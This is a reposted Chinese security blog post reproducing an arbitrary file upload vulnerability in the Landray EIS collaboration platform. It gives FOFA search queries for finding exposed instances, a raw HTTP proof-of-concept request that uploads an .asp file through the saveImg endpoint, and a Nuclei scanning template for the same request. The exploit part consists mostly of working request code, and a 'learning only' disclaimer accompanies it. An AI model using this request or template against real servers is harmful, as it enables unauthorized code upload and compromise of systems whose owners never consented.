蓝凌EIS智慧协同平台任意文件上传漏洞复现

admin 2023年10月24日11:14:36评论115 views字数 1445阅读4分49秒阅读模式


一、免责声明:


      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!


二、产品介绍:


蓝凌EIS智慧协同平台任意文件上传漏洞复现

三、资产梳理:


fofa:icon_hash="953405444"

or

title="欢迎登录智慧协同平台"

四、漏洞复现:

蓝凌EIS智慧协同平台任意文件上传漏洞复现


五、POC:


POST /eis/service/api.aspx?action=saveImg HTTP/1.1Host: 127.0.0.1:5570User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: closeAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----testContent-Length: 150
------testContent-Disposition: form-data; name="file"filename="test.asp"Content-Type: text/html
<% response.write("test")%>------test--

蓝凌EIS智慧协同平台任意文件上传漏洞复现

id: lanling_EIS_uploadinfo:  name: lanling_EIS_upload  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/eis/service/api.aspx?action=saveImg  metadata:    max-request: 1    fofa-query: icon_hash="953405444"    verified: true  tags: upload,蓝凌EIS
requests: - raw: - |- POST /eis/service/api.aspx?action=saveImg HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----test
------test Content-Disposition: form-data; name="file"filename="test.asp" Content-Type: text/html
<% response.write("test")%> ------test--
req-condition: true matchers: - type: dsl condition: and dsl: - 'contains((body), "editor_img") && status_code == 200'





原文始发于微信公众号(fly的渗透学习笔记):蓝凌EIS智慧协同平台任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月24日11:14:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝凌EIS智慧协同平台任意文件上传漏洞复现https://cn-sec.com/archives/2140324.html

发表评论

匿名网友 填写信息